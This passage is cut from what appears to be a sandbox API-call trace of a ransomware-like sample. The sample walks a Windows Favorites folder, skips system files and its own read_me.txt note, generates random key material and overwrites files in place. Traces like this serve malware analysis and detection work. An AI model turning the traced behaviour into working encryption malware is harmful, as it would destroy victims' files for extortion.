add-on site.url", lpSrch="autoexec.bat") returned 0x0 [0083.247] StrStrW (lpFirst="ie add-on site.url", lpSrch="desktop.ini") returned 0x0 [0083.247] StrStrW (lpFirst="ie add-on site.url", lpSrch="autorun.inf") returned 0x0 [0083.247] StrStrW (lpFirst="ie add-on site.url", lpSrch="ntuser.dat") returned 0x0 [0083.247] StrStrW (lpFirst="ie add-on site.url", lpSrch="iconcache.db") returned 0x0 [0083.247] StrStrW (lpFirst="ie add-on site.url", lpSrch="bootsect.bak") returned 0x0 [0083.247] StrStrW (lpFirst="ie add-on site.url", lpSrch="boot.ini") returned 0x0 [0083.247] StrStrW (lpFirst="ie add-on site.url", lpSrch="ntuser.dat.log") returned 0x0 [0083.247] StrStrW (lpFirst="ie add-on site.url", lpSrch="thumbs.db") returned 0x0 [0083.247] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 214 [0083.247] QueueUserWorkItem (Function=0x404e00, Context=0x924, Flags=0x0) returned 1 [0083.247] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa066c0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0083.247] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0083.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x918 [0083.248] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="read_me.txt") returned 0x0 [0083.248] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="autoexec.bat") returned 0x0 [0083.248] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="desktop.ini") returned 0x0 [0083.248] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="autorun.inf") returned 0x0 [0083.248] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="ntuser.dat") returned 0x0 [0083.248] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="iconcache.db") returned 0x0 [0083.248] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="bootsect.bak") returned 0x0 [0083.248] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="boot.ini") returned 0x0 [0083.248] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="ntuser.dat.log") returned 0x0 [0083.248] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="thumbs.db") returned 0x0 [0083.248] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 215 [0083.248] QueueUserWorkItem (Function=0x404e00, Context=0x918, Flags=0x0) returned 1 [0083.248] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0083.248] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0083.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x928 [0083.269] StrStrW (lpFirst="microsoft at home.url", lpSrch="read_me.txt") returned 0x0 [0083.269] StrStrW (lpFirst="microsoft at home.url", lpSrch="autoexec.bat") returned 0x0 [0083.269] StrStrW (lpFirst="microsoft at home.url", lpSrch="desktop.ini") returned 0x0 [0083.270] StrStrW (lpFirst="microsoft at home.url", lpSrch="autorun.inf") returned 0x0 [0083.270] StrStrW (lpFirst="microsoft at home.url", lpSrch="ntuser.dat") returned 0x0 [0083.270] StrStrW (lpFirst="microsoft at home.url", lpSrch="iconcache.db") returned 0x0 [0083.270] StrStrW (lpFirst="microsoft at home.url", lpSrch="bootsect.bak") returned 0x0 [0083.270] StrStrW (lpFirst="microsoft at home.url", lpSrch="boot.ini") returned 0x0 [0083.270] StrStrW (lpFirst="microsoft at home.url", lpSrch="ntuser.dat.log") returned 0x0 [0083.270] StrStrW (lpFirst="microsoft at home.url", lpSrch="thumbs.db") returned 0x0 [0083.270] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 216 [0083.270] QueueUserWorkItem (Function=0x404e00, Context=0x928, Flags=0x0) returned 1 [0083.270] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0083.270] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0083.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x910 [0083.270] StrStrW (lpFirst="microsoft at work.url", lpSrch="read_me.txt") returned 0x0 [0083.270] StrStrW (lpFirst="microsoft at work.url", lpSrch="autoexec.bat") returned 0x0 [0083.270] StrStrW (lpFirst="microsoft at work.url", lpSrch="desktop.ini") returned 0x0 [0083.270] StrStrW (lpFirst="microsoft at work.url", lpSrch="autorun.inf") returned 0x0 [0083.270] StrStrW (lpFirst="microsoft at work.url", lpSrch="ntuser.dat") returned 0x0 [0083.270] StrStrW (lpFirst="microsoft at work.url", lpSrch="iconcache.db") returned 0x0 [0083.270] StrStrW (lpFirst="microsoft at work.url", lpSrch="bootsect.bak") returned 0x0 [0083.271] StrStrW (lpFirst="microsoft at work.url", lpSrch="boot.ini") returned 0x0 [0083.271] StrStrW (lpFirst="microsoft at work.url", lpSrch="ntuser.dat.log") returned 0x0 [0083.271] StrStrW (lpFirst="microsoft at work.url", lpSrch="thumbs.db") returned 0x0 [0083.271] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 217 [0083.271] QueueUserWorkItem (Function=0x404e00, Context=0x910, Flags=0x0) returned 1 [0083.271] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0083.271] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0083.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x92c [0083.280] StrStrW (lpFirst="microsoft store.url", lpSrch="read_me.txt") returned 0x0 [0083.280] StrStrW (lpFirst="microsoft store.url", lpSrch="autoexec.bat") returned 0x0 [0083.280] StrStrW (lpFirst="microsoft store.url", lpSrch="desktop.ini") returned 0x0 [0083.281] StrStrW (lpFirst="microsoft store.url", lpSrch="autorun.inf") returned 0x0 [0083.281] StrStrW (lpFirst="microsoft store.url", lpSrch="ntuser.dat") returned 0x0 [0083.281] StrStrW (lpFirst="microsoft store.url", lpSrch="iconcache.db") returned 0x0 [0083.281] StrStrW (lpFirst="microsoft store.url", lpSrch="bootsect.bak") returned 0x0 [0083.281] StrStrW (lpFirst="microsoft store.url", lpSrch="boot.ini") returned 0x0 [0083.281] StrStrW (lpFirst="microsoft store.url", lpSrch="ntuser.dat.log") returned 0x0 [0083.281] StrStrW (lpFirst="microsoft store.url", lpSrch="thumbs.db") returned 0x0 [0083.281] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 218 [0083.281] QueueUserWorkItem (Function=0x404e00, Context=0x92c, Flags=0x0) returned 1 [0083.281] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24efa060, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24efa060, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24f201c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0083.281] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\read_me.txt") returned 61 [0083.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\read_me.txt" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x914 [0083.281] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0083.281] CloseHandle (hObject=0x914) returned 1 [0083.281] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24efa060, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24efa060, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24f201c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0083.281] FindClose (in: hFindFile=0x7cfe8e8 | out: hFindFile=0x7cfe8e8) returned 1 [0083.281] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\read_me.txt") returned 61 [0083.281] GetProcessHeap () returned 0x4f10000 [0083.281] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c90050 | out: hHeap=0x4f10000) returned 1 [0083.281] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 106 [0083.281] GetProcessHeap () returned 0x4f10000 [0083.282] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b500b0 | out: hHeap=0x4f10000) returned 1 [0083.286] SetFilePointerEx (in: hFile=0x934, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.286] ReadFile (in: hFile=0x934, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0083.286] SetFilePointerEx (in: hFile=0x934, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.286] GetProcessHeap () returned 0x4f10000 [0083.286] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.286] GetProcessHeap () returned 0x4f10000 [0083.286] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.286] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.286] GetProcessHeap () returned 0x4f10000 [0083.286] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0083.286] ReadFile (in: hFile=0x934, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x16b, lpOverlapped=0x0) returned 1 [0083.291] SetFilePointerEx (in: hFile=0x934, liDistanceToMove=0xfffffe95, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.291] WriteFile (in: hFile=0x934, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x16b, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x16b, lpOverlapped=0x0) returned 1 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.292] GetProcessHeap () returned 0x4f10000 [0083.293] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.293] GetProcessHeap () returned 0x4f10000 [0083.293] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.293] GetProcessHeap () returned 0x4f10000 [0083.293] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.293] GetProcessHeap () returned 0x4f10000 [0083.293] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.293] GetProcessHeap () returned 0x4f10000 [0083.293] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.293] GetProcessHeap () returned 0x4f10000 [0083.293] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.293] GetProcessHeap () returned 0x4f10000 [0083.293] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.293] GetProcessHeap () returned 0x4f10000 [0083.293] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.293] GetProcessHeap () returned 0x4f10000 [0083.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.294] GetProcessHeap () returned 0x4f10000 [0083.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.294] GetProcessHeap () returned 0x4f10000 [0083.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.294] GetProcessHeap () returned 0x4f10000 [0083.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.294] GetProcessHeap () returned 0x4f10000 [0083.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.294] GetProcessHeap () returned 0x4f10000 [0083.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.294] GetProcessHeap () returned 0x4f10000 [0083.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.294] GetProcessHeap () returned 0x4f10000 [0083.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.294] GetProcessHeap () returned 0x4f10000 [0083.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.294] GetProcessHeap () returned 0x4f10000 [0083.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.294] GetProcessHeap () returned 0x4f10000 [0083.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.294] GetProcessHeap () returned 0x4f10000 [0083.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.294] GetProcessHeap () returned 0x4f10000 [0083.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.294] GetProcessHeap () returned 0x4f10000 [0083.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.294] GetProcessHeap () returned 0x4f10000 [0083.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.294] GetProcessHeap () returned 0x4f10000 [0083.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.295] GetProcessHeap () returned 0x4f10000 [0083.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.295] GetProcessHeap () returned 0x4f10000 [0083.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.295] GetProcessHeap () returned 0x4f10000 [0083.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.295] GetProcessHeap () returned 0x4f10000 [0083.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.295] GetProcessHeap () returned 0x4f10000 [0083.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.295] GetProcessHeap () returned 0x4f10000 [0083.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.295] GetProcessHeap () returned 0x4f10000 [0083.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.295] GetProcessHeap () returned 0x4f10000 [0083.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.295] GetProcessHeap () returned 0x4f10000 [0083.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.295] GetProcessHeap () returned 0x4f10000 [0083.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.295] GetProcessHeap () returned 0x4f10000 [0083.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.295] GetProcessHeap () returned 0x4f10000 [0083.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.295] GetProcessHeap () returned 0x4f10000 [0083.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.295] GetProcessHeap () returned 0x4f10000 [0083.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.295] GetProcessHeap () returned 0x4f10000 [0083.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.296] GetProcessHeap () returned 0x4f10000 [0083.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.296] GetProcessHeap () returned 0x4f10000 [0083.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.296] GetProcessHeap () returned 0x4f10000 [0083.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.296] GetProcessHeap () returned 0x4f10000 [0083.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.296] GetProcessHeap () returned 0x4f10000 [0083.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.296] GetProcessHeap () returned 0x4f10000 [0083.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.296] GetProcessHeap () returned 0x4f10000 [0083.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.296] GetProcessHeap () returned 0x4f10000 [0083.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.296] GetProcessHeap () returned 0x4f10000 [0083.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.296] GetProcessHeap () returned 0x4f10000 [0083.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.296] GetProcessHeap () returned 0x4f10000 [0083.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.296] GetProcessHeap () returned 0x4f10000 [0083.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.296] GetProcessHeap () returned 0x4f10000 [0083.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.297] GetProcessHeap () returned 0x4f10000 [0083.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.297] GetProcessHeap () returned 0x4f10000 [0083.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.297] GetProcessHeap () returned 0x4f10000 [0083.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.297] GetProcessHeap () returned 0x4f10000 [0083.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.297] GetProcessHeap () returned 0x4f10000 [0083.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.297] GetProcessHeap () returned 0x4f10000 [0083.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.297] GetProcessHeap () returned 0x4f10000 [0083.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.297] SetFilePointerEx (in: hFile=0x934, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.297] WriteFile (in: hFile=0x934, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0083.297] WriteFile (in: hFile=0x934, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, 